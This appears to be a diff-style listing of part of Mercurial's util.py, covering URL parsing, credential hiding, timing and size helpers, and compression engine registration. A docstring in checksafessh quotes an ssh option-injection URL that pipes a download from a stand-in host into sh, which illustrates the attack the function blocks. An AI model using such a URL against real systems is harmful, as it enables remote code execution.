2686 # path of file:///d:/ is d:/, not /d:/
2686 if path and not hasdriveletter(path):
2687 if path and not hasdriveletter(path):
2687 path = '/' + path
2688 path = '/' + path
2688
2689
2689 if self.host and '@' in self.host:
2690 if self.host and '@' in self.host:
2690 self.user, self.host = self.host.rsplit('@', 1)
2691 self.user, self.host = self.host.rsplit('@', 1)
2691 if ':' in self.user:
2692 if ':' in self.user:
2692 self.user, self.passwd = self.user.split(':', 1)
2693 self.user, self.passwd = self.user.split(':', 1)
2693 if not self.host:
2694 if not self.host:
2694 self.host = None
2695 self.host = None
2695
2696
2696 # Don't split on colons in IPv6 addresses without ports
2697 # Don't split on colons in IPv6 addresses without ports
2697 if (self.host and ':' in self.host and
2698 if (self.host and ':' in self.host and
2698 not (self.host.startswith('[') and self.host.endswith(']'))):
2699 not (self.host.startswith('[') and self.host.endswith(']'))):
2699 self._hostport = self.host
2700 self._hostport = self.host
2700 self.host, self.port = self.host.rsplit(':', 1)
2701 self.host, self.port = self.host.rsplit(':', 1)
2701 if not self.host:
2702 if not self.host:
2702 self.host = None
2703 self.host = None
2703
2704
2704 if (self.host and self.scheme == 'file' and
2705 if (self.host and self.scheme == 'file' and
2705 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2706 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2706 raise error.Abort(_('file:// URLs can only refer to localhost'))
2707 raise error.Abort(_('file:// URLs can only refer to localhost'))
2707
2708
2708 self.path = path
2709 self.path = path
2709
2710
2710 # leave the query string escaped
2711 # leave the query string escaped
2711 for a in ('user', 'passwd', 'host', 'port',
2712 for a in ('user', 'passwd', 'host', 'port',
2712 'path', 'fragment'):
2713 'path', 'fragment'):
2713 v = getattr(self, a)
2714 v = getattr(self, a)
2714 if v is not None:
2715 if v is not None:
2715 setattr(self, a, urlreq.unquote(v))
2716 setattr(self, a, urlreq.unquote(v))
2716
2717
2717 @encoding.strmethod
2718 @encoding.strmethod
2718 def __repr__(self):
2719 def __repr__(self):
2719 attrs = []
2720 attrs = []
2720 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2721 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2721 'query', 'fragment'):
2722 'query', 'fragment'):
2722 v = getattr(self, a)
2723 v = getattr(self, a)
2723 if v is not None:
2724 if v is not None:
2724 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2725 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2725 return '<url %s>' % ', '.join(attrs)
2726 return '<url %s>' % ', '.join(attrs)
2726
2727
2727 def __bytes__(self):
2728 def __bytes__(self):
2728 r"""Join the URL's components back into a URL string.
2729 r"""Join the URL's components back into a URL string.
2729
2730
2730 Examples:
2731 Examples:
2731
2732
2732 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2733 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2733 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2734 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2735 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2735 'http://user:pw@host:80/?foo=bar&baz=42'
2736 'http://user:pw@host:80/?foo=bar&baz=42'
2736 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2737 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2737 'http://user:pw@host:80/?foo=bar%3dbaz'
2738 'http://user:pw@host:80/?foo=bar%3dbaz'
2738 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2739 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2739 'ssh://user:pw@[::1]:2200//home/joe#'
2740 'ssh://user:pw@[::1]:2200//home/joe#'
2740 >>> bytes(url(b'http://localhost:80//'))
2741 >>> bytes(url(b'http://localhost:80//'))
2741 'http://localhost:80//'
2742 'http://localhost:80//'
2742 >>> bytes(url(b'http://localhost:80/'))
2743 >>> bytes(url(b'http://localhost:80/'))
2743 'http://localhost:80/'
2744 'http://localhost:80/'
2744 >>> bytes(url(b'http://localhost:80'))
2745 >>> bytes(url(b'http://localhost:80'))
2745 'http://localhost:80/'
2746 'http://localhost:80/'
2746 >>> bytes(url(b'bundle:foo'))
2747 >>> bytes(url(b'bundle:foo'))
2747 'bundle:foo'
2748 'bundle:foo'
2748 >>> bytes(url(b'bundle://../foo'))
2749 >>> bytes(url(b'bundle://../foo'))
2749 'bundle:../foo'
2750 'bundle:../foo'
2750 >>> bytes(url(b'path'))
2751 >>> bytes(url(b'path'))
2751 'path'
2752 'path'
2752 >>> bytes(url(b'file:///tmp/foo/bar'))
2753 >>> bytes(url(b'file:///tmp/foo/bar'))
2753 'file:///tmp/foo/bar'
2754 'file:///tmp/foo/bar'
2754 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2755 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2755 'file:///c:/tmp/foo/bar'
2756 'file:///c:/tmp/foo/bar'
2756 >>> print(url(br'bundle:foo\bar'))
2757 >>> print(url(br'bundle:foo\bar'))
2757 bundle:foo\bar
2758 bundle:foo\bar
2758 >>> print(url(br'file:///D:\data\hg'))
2759 >>> print(url(br'file:///D:\data\hg'))
2759 file:///D:\data\hg
2760 file:///D:\data\hg
2760 """
2761 """
2761 if self._localpath:
2762 if self._localpath:
2762 s = self.path
2763 s = self.path
2763 if self.scheme == 'bundle':
2764 if self.scheme == 'bundle':
2764 s = 'bundle:' + s
2765 s = 'bundle:' + s
2765 if self.fragment:
2766 if self.fragment:
2766 s += '#' + self.fragment
2767 s += '#' + self.fragment
2767 return s
2768 return s
2768
2769
2769 s = self.scheme + ':'
2770 s = self.scheme + ':'
2770 if self.user or self.passwd or self.host:
2771 if self.user or self.passwd or self.host:
2771 s += '//'
2772 s += '//'
2772 elif self.scheme and (not self.path or self.path.startswith('/')
2773 elif self.scheme and (not self.path or self.path.startswith('/')
2773 or hasdriveletter(self.path)):
2774 or hasdriveletter(self.path)):
2774 s += '//'
2775 s += '//'
2775 if hasdriveletter(self.path):
2776 if hasdriveletter(self.path):
2776 s += '/'
2777 s += '/'
2777 if self.user:
2778 if self.user:
2778 s += urlreq.quote(self.user, safe=self._safechars)
2779 s += urlreq.quote(self.user, safe=self._safechars)
2779 if self.passwd:
2780 if self.passwd:
2780 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2781 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2781 if self.user or self.passwd:
2782 if self.user or self.passwd:
2782 s += '@'
2783 s += '@'
2783 if self.host:
2784 if self.host:
2784 if not (self.host.startswith('[') and self.host.endswith(']')):
2785 if not (self.host.startswith('[') and self.host.endswith(']')):
2785 s += urlreq.quote(self.host)
2786 s += urlreq.quote(self.host)
2786 else:
2787 else:
2787 s += self.host
2788 s += self.host
2788 if self.port:
2789 if self.port:
2789 s += ':' + urlreq.quote(self.port)
2790 s += ':' + urlreq.quote(self.port)
2790 if self.host:
2791 if self.host:
2791 s += '/'
2792 s += '/'
2792 if self.path:
2793 if self.path:
2793 # TODO: similar to the query string, we should not unescape the
2794 # TODO: similar to the query string, we should not unescape the
2794 # path when we store it, the path might contain '%2f' = '/',
2795 # path when we store it, the path might contain '%2f' = '/',
2795 # which we should *not* escape.
2796 # which we should *not* escape.
2796 s += urlreq.quote(self.path, safe=self._safepchars)
2797 s += urlreq.quote(self.path, safe=self._safepchars)
2797 if self.query:
2798 if self.query:
2798 # we store the query in escaped form.
2799 # we store the query in escaped form.
2799 s += '?' + self.query
2800 s += '?' + self.query
2800 if self.fragment is not None:
2801 if self.fragment is not None:
2801 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2802 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2802 return s
2803 return s
2803
2804
2804 __str__ = encoding.strmethod(__bytes__)
2805 __str__ = encoding.strmethod(__bytes__)
2805
2806
2806 def authinfo(self):
2807 def authinfo(self):
2807 user, passwd = self.user, self.passwd
2808 user, passwd = self.user, self.passwd
2808 try:
2809 try:
2809 self.user, self.passwd = None, None
2810 self.user, self.passwd = None, None
2810 s = bytes(self)
2811 s = bytes(self)
2811 finally:
2812 finally:
2812 self.user, self.passwd = user, passwd
2813 self.user, self.passwd = user, passwd
2813 if not self.user:
2814 if not self.user:
2814 return (s, None)
2815 return (s, None)
2815 # authinfo[1] is passed to urllib2 password manager, and its
2816 # authinfo[1] is passed to urllib2 password manager, and its
2816 # URIs must not contain credentials. The host is passed in the
2817 # URIs must not contain credentials. The host is passed in the
2817 # URIs list because Python < 2.4.3 uses only that to search for
2818 # URIs list because Python < 2.4.3 uses only that to search for
2818 # a password.
2819 # a password.
2819 return (s, (None, (s, self.host),
2820 return (s, (None, (s, self.host),
2820 self.user, self.passwd or ''))
2821 self.user, self.passwd or ''))
2821
2822
2822 def isabs(self):
2823 def isabs(self):
2823 if self.scheme and self.scheme != 'file':
2824 if self.scheme and self.scheme != 'file':
2824 return True # remote URL
2825 return True # remote URL
2825 if hasdriveletter(self.path):
2826 if hasdriveletter(self.path):
2826 return True # absolute for our purposes - can't be joined()
2827 return True # absolute for our purposes - can't be joined()
2827 if self.path.startswith(br'\\'):
2828 if self.path.startswith(br'\\'):
2828 return True # Windows UNC path
2829 return True # Windows UNC path
2829 if self.path.startswith('/'):
2830 if self.path.startswith('/'):
2830 return True # POSIX-style
2831 return True # POSIX-style
2831 return False
2832 return False
2832
2833
2833 def localpath(self):
2834 def localpath(self):
2834 if self.scheme == 'file' or self.scheme == 'bundle':
2835 if self.scheme == 'file' or self.scheme == 'bundle':
2835 path = self.path or '/'
2836 path = self.path or '/'
2836 # For Windows, we need to promote hosts containing drive
2837 # For Windows, we need to promote hosts containing drive
2837 # letters to paths with drive letters.
2838 # letters to paths with drive letters.
2838 if hasdriveletter(self._hostport):
2839 if hasdriveletter(self._hostport):
2839 path = self._hostport + '/' + self.path
2840 path = self._hostport + '/' + self.path
2840 elif (self.host is not None and self.path
2841 elif (self.host is not None and self.path
2841 and not hasdriveletter(path)):
2842 and not hasdriveletter(path)):
2842 path = '/' + path
2843 path = '/' + path
2843 return path
2844 return path
2844 return self._origpath
2845 return self._origpath
2845
2846
2846 def islocal(self):
2847 def islocal(self):
2847 '''whether localpath will return something that posixfile can open'''
2848 '''whether localpath will return something that posixfile can open'''
2848 return (not self.scheme or self.scheme == 'file'
2849 return (not self.scheme or self.scheme == 'file'
2849 or self.scheme == 'bundle')
2850 or self.scheme == 'bundle')
2850
2851
2851 def hasscheme(path):
2852 def hasscheme(path):
2852 return bool(url(path).scheme)
2853 return bool(url(path).scheme)
2853
2854
2854 def hasdriveletter(path):
2855 def hasdriveletter(path):
2855 return path and path[1:2] == ':' and path[0:1].isalpha()
2856 return path and path[1:2] == ':' and path[0:1].isalpha()
2856
2857
2857 def urllocalpath(path):
2858 def urllocalpath(path):
2858 return url(path, parsequery=False, parsefragment=False).localpath()
2859 return url(path, parsequery=False, parsefragment=False).localpath()
2859
2860
2860 def checksafessh(path):
2861 def checksafessh(path):
2861 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2862 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2862
2863
2863 This is a sanity check for ssh urls. ssh will parse the first item as
2864 This is a sanity check for ssh urls. ssh will parse the first item as
2864 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2865 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2865 Let's prevent these potentially exploited urls entirely and warn the
2866 Let's prevent these potentially exploited urls entirely and warn the
2866 user.
2867 user.
2867
2868
2868 Raises an error.Abort when the url is unsafe.
2869 Raises an error.Abort when the url is unsafe.
2869 """
2870 """
2870 path = urlreq.unquote(path)
2871 path = urlreq.unquote(path)
2871 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2872 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2872 raise error.Abort(_('potentially unsafe url: %r') %
2873 raise error.Abort(_('potentially unsafe url: %r') %
2873 (pycompat.bytestr(path),))
2874 (pycompat.bytestr(path),))
2874
2875
2875 def hidepassword(u):
2876 def hidepassword(u):
2876 '''hide user credential in a url string'''
2877 '''hide user credential in a url string'''
2877 u = url(u)
2878 u = url(u)
2878 if u.passwd:
2879 if u.passwd:
2879 u.passwd = '***'
2880 u.passwd = '***'
2880 return bytes(u)
2881 return bytes(u)
2881
2882
2882 def removeauth(u):
2883 def removeauth(u):
2883 '''remove all authentication information from a url string'''
2884 '''remove all authentication information from a url string'''
2884 u = url(u)
2885 u = url(u)
2885 u.user = u.passwd = None
2886 u.user = u.passwd = None
2886 return bytes(u)
2887 return bytes(u)
2887
2888
2888 timecount = unitcountfn(
2889 timecount = unitcountfn(
2889 (1, 1e3, _('%.0f s')),
2890 (1, 1e3, _('%.0f s')),
2890 (100, 1, _('%.1f s')),
2891 (100, 1, _('%.1f s')),
2891 (10, 1, _('%.2f s')),
2892 (10, 1, _('%.2f s')),
2892 (1, 1, _('%.3f s')),
2893 (1, 1, _('%.3f s')),
2893 (100, 0.001, _('%.1f ms')),
2894 (100, 0.001, _('%.1f ms')),
2894 (10, 0.001, _('%.2f ms')),
2895 (10, 0.001, _('%.2f ms')),
2895 (1, 0.001, _('%.3f ms')),
2896 (1, 0.001, _('%.3f ms')),
2896 (100, 0.000001, _('%.1f us')),
2897 (100, 0.000001, _('%.1f us')),
2897 (10, 0.000001, _('%.2f us')),
2898 (10, 0.000001, _('%.2f us')),
2898 (1, 0.000001, _('%.3f us')),
2899 (1, 0.000001, _('%.3f us')),
2899 (100, 0.000000001, _('%.1f ns')),
2900 (100, 0.000000001, _('%.1f ns')),
2900 (10, 0.000000001, _('%.2f ns')),
2901 (10, 0.000000001, _('%.2f ns')),
2901 (1, 0.000000001, _('%.3f ns')),
2902 (1, 0.000000001, _('%.3f ns')),
2902 )
2903 )
2903
2904
2904 _timenesting = [0]
2905 _timenesting = [0]
2905
2906
2906 def timed(func):
2907 def timed(func):
2907 '''Report the execution time of a function call to stderr.
2908 '''Report the execution time of a function call to stderr.
2908
2909
2909 During development, use as a decorator when you need to measure
2910 During development, use as a decorator when you need to measure
2910 the cost of a function, e.g. as follows:
2911 the cost of a function, e.g. as follows:
2911
2912
2912 @util.timed
2913 @util.timed
2913 def foo(a, b, c):
2914 def foo(a, b, c):
2914 pass
2915 pass
2915 '''
2916 '''
2916
2917
2917 def wrapper(*args, **kwargs):
2918 def wrapper(*args, **kwargs):
2918 start = timer()
2919 start = timer()
2919 indent = 2
2920 indent = 2
2920 _timenesting[0] += indent
2921 _timenesting[0] += indent
2921 try:
2922 try:
2922 return func(*args, **kwargs)
2923 return func(*args, **kwargs)
2923 finally:
2924 finally:
2924 elapsed = timer() - start
2925 elapsed = timer() - start
2925 _timenesting[0] -= indent
2926 _timenesting[0] -= indent
2926 stderr = procutil.stderr
2927 stderr = procutil.stderr
2927 stderr.write('%s%s: %s\n' %
2928 stderr.write('%s%s: %s\n' %
2928 (' ' * _timenesting[0], func.__name__,
2929 (' ' * _timenesting[0], func.__name__,
2929 timecount(elapsed)))
2930 timecount(elapsed)))
2930 return wrapper
2931 return wrapper
2931
2932
2932 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2933 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2933 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2934 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2934
2935
2935 def sizetoint(s):
2936 def sizetoint(s):
2936 '''Convert a space specifier to a byte count.
2937 '''Convert a space specifier to a byte count.
2937
2938
2938 >>> sizetoint(b'30')
2939 >>> sizetoint(b'30')
2939 30
2940 30
2940 >>> sizetoint(b'2.2kb')
2941 >>> sizetoint(b'2.2kb')
2941 2252
2942 2252
2942 >>> sizetoint(b'6M')
2943 >>> sizetoint(b'6M')
2943 6291456
2944 6291456
2944 '''
2945 '''
2945 t = s.strip().lower()
2946 t = s.strip().lower()
2946 try:
2947 try:
2947 for k, u in _sizeunits:
2948 for k, u in _sizeunits:
2948 if t.endswith(k):
2949 if t.endswith(k):
2949 return int(float(t[:-len(k)]) * u)
2950 return int(float(t[:-len(k)]) * u)
2950 return int(t)
2951 return int(t)
2951 except ValueError:
2952 except ValueError:
2952 raise error.ParseError(_("couldn't parse size: %s") % s)
2953 raise error.ParseError(_("couldn't parse size: %s") % s)
2953
2954
2954 class hooks(object):
2955 class hooks(object):
2955 '''A collection of hook functions that can be used to extend a
2956 '''A collection of hook functions that can be used to extend a
2956 function's behavior. Hooks are called in lexicographic order,
2957 function's behavior. Hooks are called in lexicographic order,
2957 based on the names of their sources.'''
2958 based on the names of their sources.'''
2958
2959
2959 def __init__(self):
2960 def __init__(self):
2960 self._hooks = []
2961 self._hooks = []
2961
2962
2962 def add(self, source, hook):
2963 def add(self, source, hook):
2963 self._hooks.append((source, hook))
2964 self._hooks.append((source, hook))
2964
2965
2965 def __call__(self, *args):
2966 def __call__(self, *args):
2966 self._hooks.sort(key=lambda x: x[0])
2967 self._hooks.sort(key=lambda x: x[0])
2967 results = []
2968 results = []
2968 for source, hook in self._hooks:
2969 for source, hook in self._hooks:
2969 results.append(hook(*args))
2970 results.append(hook(*args))
2970 return results
2971 return results
2971
2972
2972 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2973 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2973 '''Yields lines for a nicely formatted stacktrace.
2974 '''Yields lines for a nicely formatted stacktrace.
2974 Skips the 'skip' last entries, then return the last 'depth' entries.
2975 Skips the 'skip' last entries, then return the last 'depth' entries.
2975 Each file+linenumber is formatted according to fileline.
2976 Each file+linenumber is formatted according to fileline.
2976 Each line is formatted according to line.
2977 Each line is formatted according to line.
2977 If line is None, it yields:
2978 If line is None, it yields:
2978 length of longest filepath+line number,
2979 length of longest filepath+line number,
2979 filepath+linenumber,
2980 filepath+linenumber,
2980 function
2981 function
2981
2982
2982 Not be used in production code but very convenient while developing.
2983 Not be used in production code but very convenient while developing.
2983 '''
2984 '''
2984 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2985 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2985 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2986 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2986 ][-depth:]
2987 ][-depth:]
2987 if entries:
2988 if entries:
2988 fnmax = max(len(entry[0]) for entry in entries)
2989 fnmax = max(len(entry[0]) for entry in entries)
2989 for fnln, func in entries:
2990 for fnln, func in entries:
2990 if line is None:
2991 if line is None:
2991 yield (fnmax, fnln, func)
2992 yield (fnmax, fnln, func)
2992 else:
2993 else:
2993 yield line % (fnmax, fnln, func)
2994 yield line % (fnmax, fnln, func)
2994
2995
2995 def debugstacktrace(msg='stacktrace', skip=0,
2996 def debugstacktrace(msg='stacktrace', skip=0,
2996 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2997 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2997 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2998 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2998 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2999 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2999 By default it will flush stdout first.
3000 By default it will flush stdout first.
3000 It can be used everywhere and intentionally does not require an ui object.
3001 It can be used everywhere and intentionally does not require an ui object.
3001 Not be used in production code but very convenient while developing.
3002 Not be used in production code but very convenient while developing.
3002 '''
3003 '''
3003 if otherf:
3004 if otherf:
3004 otherf.flush()
3005 otherf.flush()
3005 f.write('%s at:\n' % msg.rstrip())
3006 f.write('%s at:\n' % msg.rstrip())
3006 for line in getstackframes(skip + 1, depth=depth):
3007 for line in getstackframes(skip + 1, depth=depth):
3007 f.write(line)
3008 f.write(line)
3008 f.flush()
3009 f.flush()
3009
3010
3010 class dirs(object):
3011 class dirs(object):
3011 '''a multiset of directory names from a dirstate or manifest'''
3012 '''a multiset of directory names from a dirstate or manifest'''
3012
3013
3013 def __init__(self, map, skip=None):
3014 def __init__(self, map, skip=None):
3014 self._dirs = {}
3015 self._dirs = {}
3015 addpath = self.addpath
3016 addpath = self.addpath
3016 if safehasattr(map, 'iteritems') and skip is not None:
3017 if safehasattr(map, 'iteritems') and skip is not None:
3017 for f, s in map.iteritems():
3018 for f, s in map.iteritems():
3018 if s[0] != skip:
3019 if s[0] != skip:
3019 addpath(f)
3020 addpath(f)
3020 else:
3021 else:
3021 for f in map:
3022 for f in map:
3022 addpath(f)
3023 addpath(f)
3023
3024
3024 def addpath(self, path):
3025 def addpath(self, path):
3025 dirs = self._dirs
3026 dirs = self._dirs
3026 for base in finddirs(path):
3027 for base in finddirs(path):
3027 if base in dirs:
3028 if base in dirs:
3028 dirs[base] += 1
3029 dirs[base] += 1
3029 return
3030 return
3030 dirs[base] = 1
3031 dirs[base] = 1
3031
3032
3032 def delpath(self, path):
3033 def delpath(self, path):
3033 dirs = self._dirs
3034 dirs = self._dirs
3034 for base in finddirs(path):
3035 for base in finddirs(path):
3035 if dirs[base] > 1:
3036 if dirs[base] > 1:
3036 dirs[base] -= 1
3037 dirs[base] -= 1
3037 return
3038 return
3038 del dirs[base]
3039 del dirs[base]
3039
3040
3040 def __iter__(self):
3041 def __iter__(self):
3041 return iter(self._dirs)
3042 return iter(self._dirs)
3042
3043
3043 def __contains__(self, d):
3044 def __contains__(self, d):
3044 return d in self._dirs
3045 return d in self._dirs
3045
3046
3046 if safehasattr(parsers, 'dirs'):
3047 if safehasattr(parsers, 'dirs'):
3047 dirs = parsers.dirs
3048 dirs = parsers.dirs
3048
3049
3049 def finddirs(path):
3050 def finddirs(path):
3050 pos = path.rfind('/')
3051 pos = path.rfind('/')
3051 while pos != -1:
3052 while pos != -1:
3052 yield path[:pos]
3053 yield path[:pos]
3053 pos = path.rfind('/', 0, pos)
3054 pos = path.rfind('/', 0, pos)
3054
3055
3055 # compression code
3056 # compression code
3056
3057
3057 SERVERROLE = 'server'
3058 SERVERROLE = 'server'
3058 CLIENTROLE = 'client'
3059 CLIENTROLE = 'client'
3059
3060
3060 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3061 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3061 (u'name', u'serverpriority',
3062 (u'name', u'serverpriority',
3062 u'clientpriority'))
3063 u'clientpriority'))
3063
3064
3064 class compressormanager(object):
3065 class compressormanager(object):
3065 """Holds registrations of various compression engines.
3066 """Holds registrations of various compression engines.
3066
3067
3067 This class essentially abstracts the differences between compression
3068 This class essentially abstracts the differences between compression
3068 engines to allow new compression formats to be added easily, possibly from
3069 engines to allow new compression formats to be added easily, possibly from
3069 extensions.
3070 extensions.
3070
3071
3071 Compressors are registered against the global instance by calling its
3072 Compressors are registered against the global instance by calling its
3072 ``register()`` method.
3073 ``register()`` method.
3073 """
3074 """
3074 def __init__(self):
3075 def __init__(self):
3075 self._engines = {}
3076 self._engines = {}
3076 # Bundle spec human name to engine name.
3077 # Bundle spec human name to engine name.
3077 self._bundlenames = {}
3078 self._bundlenames = {}
3078 # Internal bundle identifier to engine name.
3079 # Internal bundle identifier to engine name.
3079 self._bundletypes = {}
3080 self._bundletypes = {}
3080 # Revlog header to engine name.
3081 # Revlog header to engine name.
3081 self._revlogheaders = {}
3082 self._revlogheaders = {}
3082 # Wire proto identifier to engine name.
3083 # Wire proto identifier to engine name.
3083 self._wiretypes = {}
3084 self._wiretypes = {}
3084
3085
3085 def __getitem__(self, key):
3086 def __getitem__(self, key):
3086 return self._engines[key]
3087 return self._engines[key]
3087
3088
3088 def __contains__(self, key):
3089 def __contains__(self, key):
3089 return key in self._engines
3090 return key in self._engines
3090
3091
3091 def __iter__(self):
3092 def __iter__(self):
3092 return iter(self._engines.keys())
3093 return iter(self._engines.keys())
3093
3094
3094 def register(self, engine):
3095 def register(self, engine):
3095 """Register a compression engine with the manager.
3096 """Register a compression engine with the manager.
3096
3097
3097 The argument must be a ``compressionengine`` instance.
3098 The argument must be a ``compressionengine`` instance.
3098 """
3099 """
3099 if not isinstance(engine, compressionengine):
3100 if not isinstance(engine, compressionengine):
3100 raise ValueError(_('argument must be a compressionengine'))
3101 raise ValueError(_('argument must be a compressionengine'))
3101
3102
3102 name = engine.name()
3103 name = engine.name()
3103
3104
3104 if name in self._engines:
3105 if name in self._engines:
3105 raise error.Abort(_('compression engine %s already registered') %
3106 raise error.Abort(_('compression engine %s already registered') %
3106 name)
3107 name)
3107
3108
3108 bundleinfo = engine.bundletype()
3109 bundleinfo = engine.bundletype()
3109 if bundleinfo:
3110 if bundleinfo:
3110 bundlename, bundletype = bundleinfo
3111 bundlename, bundletype = bundleinfo
3111
3112
3112 if bundlename in self._bundlenames:
3113 if bundlename in self._bundlenames:
3113 raise error.Abort(_('bundle name %s already registered') %
3114 raise error.Abort(_('bundle name %s already registered') %
3114 bundlename)
3115 bundlename)
3115 if bundletype in self._bundletypes:
3116 if bundletype in self._bundletypes:
3116 raise error.Abort(_('bundle type %s already registered by %s') %
3117 raise error.Abort(_('bundle type %s already registered by %s') %
3117 (bundletype, self._bundletypes[bundletype]))
3118 (bundletype, self._bundletypes[bundletype]))
3118
3119
3119 # No external facing name declared.
3120 # No external facing name declared.
3120 if bundlename:
3121 if bundlename:
3121 self._bundlenames[bundlename] = name
3122 self._bundlenames[bundlename] = name
3122
3123
3123 self._bundletypes[bundletype] = name
3124 self._bundletypes[bundletype] = name
3124
3125
3125 wiresupport = engine.wireprotosupport()
3126 wiresupport = engine.wireprotosupport()
3126 if wiresupport:
3127 if wiresupport:
3127 wiretype = wiresupport.name
3128 wiretype = wiresupport.name
3128 if wiretype in self._wiretypes:
3129 if wiretype in self._wiretypes:
3129 raise error.Abort(_('wire protocol compression %s already '
3130 raise error.Abort(_('wire protocol compression %s already '
3130 'registered by %s') %
3131 'registered by %s') %
3131 (wiretype, self._wiretypes[wiretype]))
3132 (wiretype, self._wiretypes[wiretype]))
3132
3133
3133 self._wiretypes[wiretype] = name
3134 self._wiretypes[wiretype] = name
3134
3135
3135 revlogheader = engine.revlogheader()
3136 revlogheader = engine.revlogheader()
3136 if revlogheader and revlogheader in self._revlogheaders:
3137 if revlogheader and revlogheader in self._revlogheaders:
3137 raise error.Abort(_('revlog header %s already registered by %s') %
3138 raise error.Abort(_('revlog header %s already registered by %s') %
3138 (revlogheader, self._revlogheaders[revlogheader]))
3139 (revlogheader, self._revlogheaders[revlogheader]))
3139
3140
3140 if revlogheader:
3141 if revlogheader:
3141 self._revlogheaders[revlogheader] = name
3142 self._revlogheaders[revlogheader] = name
3142
3143
3143 self._engines[name] = engine
3144 self._engines[name] = engine
3144
3145
3145 @property
3146 @property
3146 def supportedbundlenames(self):
3147 def supportedbundlenames(self):
3147 return set(self._bundlenames.keys())
3148 return set(self._bundlenames.keys())
3148
3149
3149 @property
3150 @property
3150 def supportedbundletypes(self):
3151 def supportedbundletypes(self):
3151 return set(self._bundletypes.keys())
3152 return set(self._bundletypes.keys())
3152
3153
3153 def forbundlename(self, bundlename):
3154 def forbundlename(self, bundlename):
3154 """Obtain a compression engine registered to a bundle name.
3155 """Obtain a compression engine registered to a bundle name.
3155
3156
3156 Will raise KeyError if the bundle type isn't registered.
3157 Will raise KeyError if the bundle type isn't registered.
3157
3158
3158 Will abort if the engine is known but not available.
3159 Will abort if the engine is known but not available.
3159 """
3160 """
3160 engine = self._engines[self._bundlenames[bundlename]]
3161 engine = self._engines[self._bundlenames[bundlename]]
3161 if not engine.available():
3162 if not engine.available():
3162 raise error.Abort(_('compression engine %s could not be loaded') %
3163 raise error.Abort(_('compression engine %s could not be loaded') %
3163 engine.name())
3164 engine.name())
3164 return engine
3165 return engine
3165
3166
3166 def forbundletype(self, bundletype):
3167 def forbundletype(self, bundletype):
3167 """Obtain a compression engine registered to a bundle type.
3168 """Obtain a compression engine registered to a bundle type.
3168
3169
3169 Will raise KeyError if the bundle type isn't registered.
3170 Will raise KeyError if the bundle type isn't registered.
3170
3171
3171 Will abort if the engine is known but not available.
3172 Will abort if the engine is known but not available.
3172 """
3173 """
3173 engine = self._engines[self._bundletypes[bundletype]]
3174 engine = self._engines[self._bundletypes[bundletype]]
3174 if not engine.available():
3175 if not engine.available():
3175 raise error.Abort(_('compression engine %s could not be loaded') %
3176 raise error.Abort(_('compression engine %s could not be loaded') %
3176 engine.name())
3177 engine.name())
3177 return engine
3178 return engine
3178
3179
3179 def supportedwireengines(self, role, onlyavailable=True):
3180 def supportedwireengines(self, role, onlyavailable=True):
3180 """Obtain compression engines that support the wire protocol.
3181 """Obtain compression engines that support the wire protocol.
3181
3182
3182 Returns a list of engines in prioritized order, most desired first.
3183 Returns a list of engines in prioritized order, most desired first.
3183
3184
3184 If ``onlyavailable`` is set, filter out engines that can't be
3185 If ``onlyavailable`` is set, filter out engines that can't be
3185 loaded.
3186 loaded.
3186 """
3187 """
3187 assert role in (SERVERROLE, CLIENTROLE)
3188 assert role in (SERVERROLE, CLIENTROLE)
3188
3189
3189 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3190 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3190
3191
3191 engines = [self._engines[e] for e in self._wiretypes.values()]
3192 engines = [self._engines[e] for e in self._wiretypes.values()]
3192 if onlyavailable:
3193 if onlyavailable:
3193 engines = [e for e in engines if e.available()]
3194 engines = [e for e in engines if e.available()]
3194
3195
3195 def getkey(e):
